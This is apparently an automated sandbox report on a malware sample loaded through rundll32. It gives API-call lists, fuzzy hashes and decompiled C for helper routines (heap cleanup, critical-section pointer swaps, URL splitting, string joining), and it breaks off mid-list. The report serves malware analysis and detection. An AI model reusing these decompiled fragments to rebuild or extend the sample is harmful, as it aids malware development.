                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                          • String ID:
                          • API String ID: 4211439915-0
                          • Opcode ID: 7546d50412fc2ebafd4215447eefe1c08dd27338420e3a5fb09881070ce08c5a
                          • Instruction ID: a23761cfcb6a3714f11a834273a7cbb66fd1f288124927f2396cc71d0cf9929d
                          • Opcode Fuzzy Hash: 7546d50412fc2ebafd4215447eefe1c08dd27338420e3a5fb09881070ce08c5a
                          • Instruction Fuzzy Hash: 00F06D32A05124BBD7302A65EC4EF6B7E66EF01376F215661FA29A72E0CA217C41C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,?,00000000,05B67BEE), ref: 05B80DE2
                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05B80DF7
                          • wsprintfA.USER32 ref: 05B80E13
                            • Part of subcall function 05B7C01F: memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                            • Part of subcall function 05B7C01F: wcstombs.NTDLL ref: 05B7C077
                            • Part of subcall function 05B7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                            • Part of subcall function 05B7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C131
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C136
                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05B80E2F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                          • String ID:
                          • API String ID: 1624158581-0
                          • Opcode ID: 5586afaf71d7200afa8db9151feb0fa0d5048443751b60add41a2f80b5690be9
                          • Instruction ID: f18b353b61e8cfed56158f73c350715747a24175a1d64bc3a2a7005e409c195d
                          • Opcode Fuzzy Hash: 5586afaf71d7200afa8db9151feb0fa0d5048443751b60add41a2f80b5690be9
                          • Instruction Fuzzy Hash: D2F0B4316100117BC6302629EC0EF7B7FAEEBC2765F162151FA01E7291CE20F809D6A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B66540
                          • Sleep.KERNEL32(0000000A), ref: 05B6654A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B66572
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B66590
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: 153a0094071c2a458eead6c85949b0c4469ac091439f29b77abc8657540c9850
                          • Instruction ID: e9922c59ccb1e4b9bc49341156d6b11f132b9fd28772dfcc2b628ea27d863b93
                          • Opcode Fuzzy Hash: 153a0094071c2a458eead6c85949b0c4469ac091439f29b77abc8657540c9850
                          • Instruction Fuzzy Hash: 7BF03471210240EFEB209F28E84BF3A3FA6EF00300F009456B506EB291CA28F840DB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Shutdown routine: signals the global event at 0x100a30c, then polls the global
                          			// flag at 0x100a35c in alertable 100 ms SleepEx slices until it reads zero or the
                          			// 0x7fffffff ms budget is used up, closes the event and destroys the private heap
                          			// whose handle lives at 0x100a2d8. Always returns 0.
                          			E01007607() {
                          				void* _t1;
                          				intOrPtr _t5;
                          				void* _t6;
                          				void* _t7;
                          				void* _t11;
                          
                          				_t1 =  *0x100a30c; // 0x2d0 (event handle)
                          				if(_t1 == 0) {
                          					L8:
                          					return 0;
                          				}
                          				SetEvent(_t1);
                          				_t11 = 0x7fffffff; // remaining wait budget in milliseconds
                          				while(1) {
                          					SleepEx(0x64, 1); // 100 ms, alertable: queued APCs still run
                          					_t5 =  *0x100a35c; // 0x0 (flag polled until it is cleared)
                          					if(_t5 == 0) {
                          						break;
                          					}
                          					_t11 = _t11 - 0x64;
                          					if(_t11 > 0) {
                          						continue;
                          					}
                          					break; // budget exhausted
                          				}
                          				_t6 =  *0x100a30c; // 0x2d0
                          				if(_t6 != 0) {
                          					CloseHandle(_t6);
                          				}
                          				_t7 =  *0x100a2d8; // 0x4ea0000 (private heap handle)
                          				if(_t7 != 0) {
                          					HeapDestroy(_t7);
                          				}
                          				goto L8;
                          			}

                          APIs
                          • SetEvent.KERNEL32(000002D0,00000001,01005E70), ref: 01007612
                          • SleepEx.KERNEL32(00000064,00000001), ref: 01007621
                          • CloseHandle.KERNEL32(000002D0), ref: 01007642
                          • HeapDestroy.KERNEL32(04EA0000), ref: 01007652
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseDestroyEventHandleHeapSleep
                          • String ID:
                          • API String ID: 4109453060-0
                          • Opcode ID: 931d9ebe303f37c4293f369cfece101ef145e536fd1af6cd669769464db71d1e
                          • Instruction ID: 4ede886923f4278a8d8dcb734d4052e0ccbdaf89282462309787d769e2397809
                          • Opcode Fuzzy Hash: 931d9ebe303f37c4293f369cfece101ef145e536fd1af6cd669769464db71d1e
                          • Instruction Fuzzy Hash: AFF01C71B013129BFB329B3D9C4CA423BD8AB18661F048550BEC6D32C9CB6EE4449760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B80B35
                          • Sleep.KERNEL32(0000000A), ref: 05B80B3F
                          • HeapFree.KERNEL32(00000000), ref: 05B80B6D
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B80B82
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: b2cf2ee06b402ca0212c581c42681d00ba59d80a204424b45d834b3aff717e84
                          • Instruction ID: 8d994ea26fe3bcf2241f36a98f82eec33e5e4e347b27b64e028cedb3ba0151a4
                          • Opcode Fuzzy Hash: b2cf2ee06b402ca0212c581c42681d00ba59d80a204424b45d834b3aff717e84
                          • Instruction Fuzzy Hash: 4AF034B4260601EFE718AB14E88AF393FA2FF00354B086049F802DB290CB38FC44DA21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			// Replaces the pointer held in the first slot of the global object at 0x100a3cc
                          			// under the critical section embedded in that object (index 0x10). While the word
                          			// at index 0x16 is non-zero it spins in 10 ms Sleep slices; it then frees the old
                          			// pointer unless it is 0x100b827, a location inside the loaded image rather than a
                          			// heap block, and stores the new value. The two unresolved __imp__ calls of the raw
                          			// decompilation are RtlEnterCriticalSection (ref 010072D0) and
                          			// RtlLeaveCriticalSection (ref 0100731D) according to the API list below.
                          			E010072C7() {
                          				void* _v0; // stack slot whose origin the decompiler could not resolve; the value stored
                          				void** _t1;
                          				void** _t3;
                          				void** _t5;
                          				void** _t7;
                          				void** _t8;
                          				void* _t10;
                          
                          				_t3 =  *0x100a3cc; // 0x52995b0
                          				RtlEnterCriticalSection( &(_t3[0x10])); // __imp__ in the raw output
                          				while(1) {
                          					_t5 =  *0x100a3cc; // 0x52995b0
                          					_t1 =  &(_t5[0x16]); // 0x0
                          					if( *_t1 == 0) {
                          						break;
                          					}
                          					Sleep(0xa); // busy-wait while the slot is in use
                          				}
                          				_t7 =  *0x100a3cc; // 0x52995b0
                          				_t10 =  *_t7;
                          				if(_t10 != 0 && _t10 != 0x100b827) { // never free the in-image default
                          					HeapFree( *0x100a2d8, 0, _t10); // 0x100a2d8: the private heap, see E01007607
                          					_t7 =  *0x100a3cc; // 0x52995b0
                          				}
                          				 *_t7 = _v0;
                          				_t8 =  &(_t7[0x10]);
                          				RtlLeaveCriticalSection(_t8); // __imp__ in the raw output
                          				return _t8;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 010072D0
                          • Sleep.KERNEL32(0000000A), ref: 010072DA
                          • HeapFree.KERNEL32(00000000), ref: 01007308
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 0100731D
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: ef42c8ef87503e07213293b3f7307d2dcccb7fcfbf7175455b70b3933a4ab03c
                          • Instruction ID: a28cd2f3dff1bba8cd488240954b6b9d06cd987101cc35d308e21a22ef1fa919
                          • Opcode Fuzzy Hash: ef42c8ef87503e07213293b3f7307d2dcccb7fcfbf7175455b70b3933a4ab03c
                          • Instruction Fuzzy Hash: A2F0D474300201DFF73ACB58E849B2A37E5AB44314F049058F9CAE72A9C67EAC00CB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7095D
                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,05B6C1F8,00000000), ref: 05B709AB
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05B81616,00000000,05B6C1F8,05B7E6A0,00000000,05B6C1F8,05B700C3,00000000,05B6C1F8,05B6306D,00000000), ref: 05B70CB6
                          • GetLastError.KERNEL32(?,00000000,?), ref: 05B70FB8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseErrorFreeHandleHeapLastmemset
                          • String ID:
                          • API String ID: 2333114656-0
                          • Opcode ID: 2b2b478c47e0bacbd4ff33c26785f4f3fecb881b43a4ca71bb580ea4a0c510dd
                          • Instruction ID: c346912f3efcd1bfcc1231c58cd9052c39fbe7dc47b93bd3d0b56a0fb1a64e2b
                          • Opcode Fuzzy Hash: 2b2b478c47e0bacbd4ff33c26785f4f3fecb881b43a4ca71bb580ea4a0c510dd
                          • Instruction Fuzzy Hash: 4D51C63124860DBEDB11BE74DC4DF7B766AFB55210F1000D3F935AA180DA70FA519E52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B763D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?), ref: 05B763F5
                            • Part of subcall function 05B763D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B76407
                            • Part of subcall function 05B763D1: wcstombs.NTDLL ref: 05B76415
                            • Part of subcall function 05B763D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?), ref: 05B76439
                            • Part of subcall function 05B763D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B7644E
                            • Part of subcall function 05B763D1: mbstowcs.NTDLL ref: 05B7645B
                            • Part of subcall function 05B763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B7646D
                            • Part of subcall function 05B763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B76487
                          • GetLastError.KERNEL32 ref: 05B6A82D
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C58
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C7C
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05B617D6,?,?,?,?,?,?,?), ref: 05B73C8A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6A849
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6A85A
                          • SetLastError.KERNEL32(00000000), ref: 05B6A85D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                          • String ID:
                          • API String ID: 3867366388-0
                          • Opcode ID: dfabf352fc3df84f252caf208220c9b63f1b6f00f77a10f5cbac1357888a359c
                          • Instruction ID: 652ffc51c74b2573552bf003e8f60c1cee2190a1bda98b74d1040d0f5b55a389
                          • Opcode Fuzzy Hash: dfabf352fc3df84f252caf208220c9b63f1b6f00f77a10f5cbac1357888a359c
                          • Instruction Fuzzy Hash: CC313032900108FFCF129F99DC458EEBFB6FF48710B104196F926A2161D735AA51EF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D6F2
                            • Part of subcall function 05B7D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D710
                            • Part of subcall function 05B7D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 05B7D73C
                            • Part of subcall function 05B7D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D753
                            • Part of subcall function 05B7D698: HeapFree.KERNEL32(00000000,00000000), ref: 05B7D766
                            • Part of subcall function 05B7D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D775
                          • GetLastError.KERNEL32 ref: 05B617EE
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C58
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C7C
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05B617D6,?,?,?,?,?,?,?), ref: 05B73C8A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6180A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6181B
                          • SetLastError.KERNEL32(00000000), ref: 05B6181E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                          • String ID:
                          • API String ID: 2451549186-0
                          • Opcode ID: 3523f2b443b1f7305ca5fcb7df2c2da59c1a9c1d2f7679fa673179e1e5d6fbdc
                          • Instruction ID: 81914b54e28758f5d6320b391b8dfe5436e8dd887c6d6b60a88e17201078381e
                          • Opcode Fuzzy Hash: 3523f2b443b1f7305ca5fcb7df2c2da59c1a9c1d2f7679fa673179e1e5d6fbdc
                          • Instruction Fuzzy Hash: 31312972900108FFCF129F99DC45CAEBFB6FF48720B104596F926A2160D735AA61EF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 30a66862894a7ea5392222b2030e00281d427d8e7430966517e03a841f2e3589
                          • Instruction ID: 0d39fef5833a1c063f4f19f4e91daf254d16effd7a90f9da3e20f0651a694192
                          • Opcode Fuzzy Hash: 30a66862894a7ea5392222b2030e00281d427d8e7430966517e03a841f2e3589
                          • Instruction Fuzzy Hash: AF216DB6601919BFCB219F60DC8496ABB69FF09305B140199E94686C50DB36F4B1CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B82DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05B6D463,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000), ref: 05B82DF1
                            • Part of subcall function 05B82DE3: StrChrA.SHLWAPI(?,0000003F,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82DFB
                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                          • String ID:
                          • API String ID: 3767559652-0
                          • Opcode ID: 0bdd87f25be066947ada0fb77960621c0412b976e0226cb7665e997a042917d9
                          • Instruction ID: 091bd55fd004df548ef3ab781e6aa611771d786f4ad3445807a69a52020b8474
                          • Opcode Fuzzy Hash: 0bdd87f25be066947ada0fb77960621c0412b976e0226cb7665e997a042917d9
                          • Instruction Fuzzy Hash: 5D217276604255BFCB12AF64CC88ABE7FA9EF05290B048094F9059F201EB39FD00C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E010045C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                          				intOrPtr* _v8;
                          				void* _t17;
                          				intOrPtr* _t22;
                          				void* _t27;
                          				char* _t30;
                          				void* _t33;
                          				void* _t34;
                          				void* _t36;
                          				void* _t37;
                          				void* _t39;
                          				int _t42;
                          
                          				_t17 = __eax;
                          				_t37 = 0;
                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                          				_t2 = _t17 + 1; // 0x1
                          				_t28 = _t2;
                          				_t34 = E01006D63(_t2);
                          				if(_t34 != 0) {
                          					_t30 = E01006D63(_t28);
                          					if(_t30 == 0) {
                          						E01006C2C(_t34);
                          					} else {
                          						_t39 = _a4;
                          						_t22 = E01007A57(_t39);
                          						_v8 = _t22;
                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                          							_a4 = _t39;
                          						} else {
                          							_t26 = _t22 + 2;
                          							_a4 = _t22 + 2;
                          							_t22 = E01007A57(_t26);
                          							_v8 = _t22;
                          						}
                          						if(_t22 == 0) {
                          							__imp__(_t34, _a4);
                          							 *_t30 = 0x2f;
                          							 *((char*)(_t30 + 1)) = 0;
                          						} else {
                          							_t42 = _t22 - _a4;
                          							memcpy(_t34, _a4, _t42);
                          							 *((char*)(_t34 + _t42)) = 0;
                          							__imp__(_t30, _v8);
                          						}
                          						 *_a8 = _t34;
                          						_t37 = 1;
                          						 *_a12 = _t30;
                          					}
                          				}
                          				return _t37;
                          			}

                          APIs
                          • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0), ref: 010045D0
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                            • Part of subcall function 01007A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010045FE,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102), ref: 01007A65
                            • Part of subcall function 01007A57: StrChrA.SHLWAPI(?,0000003F,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 01007A6F
                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102,010037A0,?), ref: 0100462E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0100463E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0100464A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                          • String ID:
                          • API String ID: 3767559652-0
                          • Opcode ID: 7c5655e873c874f126992a3ad5e23610bc15cd8fb54bf4142694933dc5ecea19
                          • Instruction ID: 415af40db6a26d99bcb0e8140c9178013c978ab5439a75055f5e40a7bc8b1928
                          • Opcode Fuzzy Hash: 7c5655e873c874f126992a3ad5e23610bc15cd8fb54bf4142694933dc5ecea19
                          • Instruction Fuzzy Hash: D821D571904256EFEB13AFB8CC44EAF7FF9AF59244F054051FA859B241E635D900C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                          • Instruction ID: babf06b712ca6163cc254836957f6b1b935850b3bf9eb5e0eacf8f6483e0d87a
                          • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                          • Instruction Fuzzy Hash: 16119E7664191DBFCB209FA0DC84A66B778FF09300F050198F95692850D772F9B19BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010028C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                          				void* _v8;
                          				void* _t18;
                          				int _t25;
                          				int _t29;
                          				int _t34;
                          
                          				_t29 = lstrlenW(_a4);
                          				_t25 = lstrlenW(_a8);
                          				_t18 = E01006D63(_t25 + _t29 + _t25 + _t29 + 2);
                          				_v8 = _t18;
                          				if(_t18 != 0) {
                          					_t34 = _t29 + _t29;
                          					memcpy(_t18, _a4, _t34);
                          					_t10 = _t25 + 2; // 0x2
                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                          				}
                          				return _v8;
                          			}

                          APIs
                          • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,052993F4,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028D4
                          • lstrlenW.KERNEL32(010021EB,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028DB
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,010021EB,004F0053,052993F4,?,?,?,?,?,?,010066BE), ref: 010028FB
                          • memcpy.NTDLL(76C869A0,010021EB,00000002,00000000,004F0053,76C869A0,?,?,010021EB,004F0053,052993F4), ref: 0100290E
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlenmemcpy$AllocateHeap
                          • String ID:
                          • API String ID: 2411391700-0
                          • Opcode ID: f5211d40b89a93d9115bce4884f9b3270c89be1c22c4cedb35cf1cac9b094b3d
                          • Instruction ID: f09e69679268e534278c0474c3285c3a5f2c1117a6f3c4a33bc8a3e5a2652669
                          • Opcode Fuzzy Hash: f5211d40b89a93d9115bce4884f9b3270c89be1c22c4cedb35cf1cac9b094b3d
                          • Instruction Fuzzy Hash: 01F04F72900119BFDF12EFA9CC84CCE7BACEF08254B018062F904D7101E631EA148BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,05B75F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05B781A4
                          • lstrlen.KERNEL32(?,?,?,?), ref: 05B781A9
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 05B781C5
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B781E3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                          • String ID:
                          • API String ID: 1697500751-0
                          • Opcode ID: 34c7c642cea8603f3917b05a4c38ffd0160d57d8ea16818f4fc5a4f98619abb1
                          • Instruction ID: 15b3615a8088ad43f748a1cb20a34b6171ea062a730e5e96fc35edb4c0c2b1cb
                          • Opcode Fuzzy Hash: 34c7c642cea8603f3917b05a4c38ffd0160d57d8ea16818f4fc5a4f98619abb1
                          • Instruction Fuzzy Hash: 68F02DBA504B41BBD73196AA9C4CE2BBF9AFF88211F280491F90983200E631E004CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05FB8560,76C85520,76CC81D0,773BEEF0,05B6E873,?), ref: 05B68DD7
                          • lstrlen.KERNEL32(?), ref: 05B68DDF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
